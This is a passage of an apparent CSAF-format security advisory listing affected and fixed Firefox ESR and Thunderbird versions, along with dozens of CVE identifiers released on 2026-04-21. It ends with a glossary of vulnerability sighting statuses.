"name": "\u003c115.35",
"product": {
"name": "Mozilla Firefox ESR \u003c115.35",
"product_id": "T053197"
}
},
{
"category": "product_version",
"name": "115.35",
"product": {
"name": "Mozilla Firefox ESR 115.35",
"product_id": "T053197-fixed",
"product_identification_helper": {
"cpe": "cpe:/a:mozilla:firefox_esr:115.35"
}
}
}
],
"category": "product_name",
"name": "Firefox ESR"
},
{
"branches": [
{
"category": "product_version_range",
"name": "\u003c140.10",
"product": {
"name": "Mozilla Thunderbird \u003c140.10",
"product_id": "T053194"
}
},
{
"category": "product_version",
"name": "140.1",
"product": {
"name": "Mozilla Thunderbird 140.10",
"product_id": "T053194-fixed",
"product_identification_helper": {
"cpe": "cpe:/a:mozilla:thunderbird:140.10"
}
}
},
{
"category": "product_version_range",
"name": "\u003c150",
"product": {
"name": "Mozilla Thunderbird \u003c150",
"product_id": "T053195"
}
},
{
"category": "product_version",
"name": "150",
"product": {
"name": "Mozilla Thunderbird 150",
"product_id": "T053195-fixed",
"product_identification_helper": {
"cpe": "cpe:/a:mozilla:thunderbird:150"
}
}
}
],
"category": "product_name",
"name": "Thunderbird"
}
],
"category": "vendor",
"name": "Mozilla"
},
{
"branches": [
{
"category": "product_name",
"name": "SUSE openSUSE",
"product": {
"name": "SUSE openSUSE",
"product_id": "T027843",
"product_identification_helper": {
"cpe": "cpe:/o:suse:opensuse:-"
}
}
}
],
"category": "vendor",
"name": "SUSE"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2026-2781",
"product_status": {
"known_affected": [
"T053198",
"T053196",
"T053197",
"2951",
"T053194",
"T053195",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-2781"
},
{
"cve": "CVE-2026-33626",
"product_status": {
"known_affected": [
"T053198",
"T053196",
"T053197",
"2951",
"T053194",
"T053195",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-33626"
},
{
"cve": "CVE-2026-6746",
"product_status": {
"known_affected": [
"T053198",
"T053196",
"T053197",
"2951",
"T053194",
"T053195",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-6746"
},
{
"cve": "CVE-2026-6747",
"product_status": {
"known_affected": [
"T053198",
"T053196",
"T053197",
"2951",
"T053194",
"T053195",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-6747"
},
{
"cve": "CVE-2026-6748",
"product_status": {
"known_affected": [
"T053198",
"T053196",
"T053197",
"2951",
"T053194",
"T053195",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-6748"
},
{
"cve": "CVE-2026-6749",
"product_status": {
"known_affected": [
"T053198",
"T053196",
"T053197",
"2951",
"T053194",
"T053195",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-6749"
},
{
"cve": "CVE-2026-6750",
"product_status": {
"known_affected": [
"T053198",
"T053196",
"T053197",
"2951",
"T053194",
"T053195",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-6750"
},
{
"cve": "CVE-2026-6751",
"product_status": {
"known_affected": [
"T053198",
"T053196",
"T053197",
"2951",
"T053194",
"T053195",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-6751"
},
{
"cve": "CVE-2026-6752",
"product_status": {
"known_affected": [
"T053198",
"T053196",
"T053197",
"2951",
"T053194",
"T053195",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-6752"
},
{
"cve": "CVE-2026-6753",
"product_status": {
"known_affected": [
"T053198",
"T053196",
"T053197",
"2951",
"T053194",
"T053195",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-6753"
},
{
"cve": "CVE-2026-6754",
"product_status": {
"known_affected": [
"T053198",
"T053196",
"T053197",
"2951",
"T053194",
"T053195",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-6754"
},
{
"cve": "CVE-2026-6755",
"product_status": {
"known_affected": [
"T053198",
"T053196",
"T053197",
"2951",
"T053194",
"T053195",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-6755"
},
{
"cve": "CVE-2026-6756",
"product_status": {
"known_affected": [
"T053198",
"T053196",
"T053197",
"2951",
"T053194",
"T053195",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-6756"
},
{
"cve": "CVE-2026-6757",
"product_status": {
"known_affected": [
"T053198",
"T053196",
"T053197",
"2951",
"T053194",
"T053195",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-6757"
},
{
"cve": "CVE-2026-6758",
"product_status": {
"known_affected": [
"T053198",
"T053196",
"T053197",
"2951",
"T053194",
"T053195",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-6758"
},
{
"cve": "CVE-2026-6759",
"product_status": {
"known_affected": [
"T053198",
"T053196",
"T053197",
"2951",
"T053194",
"T053195",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-6759"
},
{
"cve": "CVE-2026-6760",
"product_status": {
"known_affected": [
"T053198",
"T053196",
"T053197",
"2951",
"T053194",
"T053195",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-6760"
},
{
"cve": "CVE-2026-6761",
"product_status": {
"known_affected": [
"T053198",
"T053196",
"T053197",
"2951",
"T053194",
"T053195",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-6761"
},
{
"cve": "CVE-2026-6762",
"product_status": {
"known_affected": [
"T053198",
"T053196",
"T053197",
"2951",
"T053194",
"T053195",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-6762"
},
{
"cve": "CVE-2026-6763",
"product_status": {
"known_affected": [
"T053198",
"T053196",
"T053197",
"2951",
"T053194",
"T053195",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-6763"
},
{
"cve": "CVE-2026-6764",
"product_status": {
"known_affected": [
"T053198",
"T053196",
"T053197",
"2951",
"T053194",
"T053195",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-6764"
},
{
"cve": "CVE-2026-6765",
"product_status": {
"known_affected": [
"T053198",
"T053196",
"T053197",
"2951",
"T053194",
"T053195",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-6765"
},
{
"cve": "CVE-2026-6766",
"product_status": {
"known_affected": [
"T053198",
"T053196",
"T053197",
"2951",
"T053194",
"T053195",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-6766"
},
{
"cve": "CVE-2026-6767",
"product_status": {
"known_affected": [
"T053198",
"T053196",
"T053197",
"2951",
"T053194",
"T053195",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-6767"
},
{
"cve": "CVE-2026-6768",
"product_status": {
"known_affected": [
"T053198",
"T053196",
"T053197",
"2951",
"T053194",
"T053195",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-6768"
},
{
"cve": "CVE-2026-6769",
"product_status": {
"known_affected": [
"T053198",
"T053196",
"T053197",
"2951",
"T053194",
"T053195",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-6769"
},
{
"cve": "CVE-2026-6770",
"product_status": {
"known_affected": [
"T053198",
"T053196",
"T053197",
"2951",
"T053194",
"T053195",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-6770"
},
{
"cve": "CVE-2026-6771",
"product_status": {
"known_affected": [
"T053198",
"T053196",
"T053197",
"2951",
"T053194",
"T053195",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-6771"
},
{
"cve": "CVE-2026-6772",
"product_status": {
"known_affected": [
"T053198",
"T053196",
"T053197",
"2951",
"T053194",
"T053195",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-6772"
},
{
"cve": "CVE-2026-6773",
"product_status": {
"known_affected": [
"T053198",
"T053196",
"T053197",
"2951",
"T053194",
"T053195",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-6773"
},
{
"cve": "CVE-2026-6774",
"product_status": {
"known_affected": [
"T053198",
"T053196",
"T053197",
"2951",
"T053194",
"T053195",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-6774"
},
{
"cve": "CVE-2026-6775",
"product_status": {
"known_affected": [
"T053198",
"T053196",
"T053197",
"2951",
"T053194",
"T053195",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-6775"
},
{
"cve": "CVE-2026-6776",
"product_status": {
"known_affected": [
"T053198",
"T053196",
"T053197",
"2951",
"T053194",
"T053195",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-6776"
},
{
"cve": "CVE-2026-6777",
"product_status": {
"known_affected": [
"T053198",
"T053196",
"T053197",
"2951",
"T053194",
"T053195",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-6777"
},
{
"cve": "CVE-2026-6778",
"product_status": {
"known_affected": [
"T053198",
"T053196",
"T053197",
"2951",
"T053194",
"T053195",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-6778"
},
{
"cve": "CVE-2026-6779",
"product_status": {
"known_affected": [
"T053198",
"T053196",
"T053197",
"2951",
"T053194",
"T053195",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-6779"
},
{
"cve": "CVE-2026-6780",
"product_status": {
"known_affected": [
"T053198",
"T053196",
"T053197",
"2951",
"T053194",
"T053195",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-6780"
},
{
"cve": "CVE-2026-6781",
"product_status": {
"known_affected": [
"T053198",
"T053196",
"T053197",
"2951",
"T053194",
"T053195",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-6781"
},
{
"cve": "CVE-2026-6782",
"product_status": {
"known_affected": [
"T053198",
"T053196",
"T053197",
"2951",
"T053194",
"T053195",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-6782"
},
{
"cve": "CVE-2026-6783",
"product_status": {
"known_affected": [
"T053198",
"T053196",
"T053197",
"2951",
"T053194",
"T053195",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-6783"
},
{
"cve": "CVE-2026-6784",
"product_status": {
"known_affected": [
"T053198",
"T053196",
"T053197",
"2951",
"T053194",
"T053195",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-6784"
},
{
"cve": "CVE-2026-6785",
"product_status": {
"known_affected": [
"T053198",
"T053196",
"T053197",
"2951",
"T053194",
"T053195",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-6785"
},
{
"cve": "CVE-2026-6786",
"product_status": {
"known_affected": [
"T053198",
"T053196",
"T053197",
"2951",
"T053194",
"T053195",
"T027843"
]
},
"release_date": "2026-04-21T22:00:00.000+00:00",
"title": "CVE-2026-6786"
}
]
}
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.